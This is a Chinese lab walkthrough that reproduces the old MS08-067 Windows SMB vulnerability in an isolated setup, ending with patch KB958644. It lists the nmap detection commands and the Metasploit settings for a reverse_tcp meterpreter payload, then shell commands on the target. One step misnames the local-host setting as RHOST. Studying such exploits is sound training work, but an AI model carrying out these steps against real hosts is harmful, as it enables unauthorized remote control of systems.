3.7.2 ms08-067

漏洞名称

MS08-067远程溢出漏洞(CVE-2008-4250)

漏洞等级

高危

漏洞描述

MS08-067 漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。

NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

漏洞影响

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta

漏洞复现

实验环境

操作机 :Kali 2017

操作机IP:172.16.11.2

目标机:Windows XP S2 中文版

目标机IP:172.16.12.2

实验步骤

第1步 漏洞探测 打开Kali终端,使用Nmap对目标机开放端口进行扫描

nmap -sV -Pn 172.16.12.2

目标机开放了135139445``3389端口,且目标机系统为Windows_XP。一想到XP或者2003系统的445端口开放,我们就能想到轰动一时的ms08-067。

我们使用nmap的漏洞扫描脚本查看漏洞是否可用

nmap -sV -Pn -p 445 --script smb-vuln-ms08-067.nse 172.16.12.2

扫描结果VULNERABLE,可以利用

第2步 漏洞利用

终端内输入msfconsole打开 metasploite 命令行客户端,使用search命令查找ms08-067的漏洞利用模块

使用该模块,并查看配置

需要设置目标地址,设置命令:

set RHOST 172.16.12.2

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload

set payload windows/meterpreter/reverse_tcp

当然载荷也需要进行配置,所以我们选择渗透所用的载荷后,同样使用show options查看配置信息

配置中缺少本地主机 RHOST,设置一下

MS08-067 针对不同的系统可以选择不同的target,使用命令show targets可以看见支持的系统

我们选择此次目标机的系统,编号10 set target 10

配置完成后如下

成功获取来自目标主机的Session会话

第3步:Meterpreter常用命令

我们已经成功的获取Session会话了,接下来,我们使用meterpreter的一些常用基本功能

sysinfo

使用sysinfo命令可以查看目标系统的基本信息

shell

shell 命令用于获取一个可以交互的shell,方便执行系统命令

漏洞修复

相关补丁

KB958644

Last updated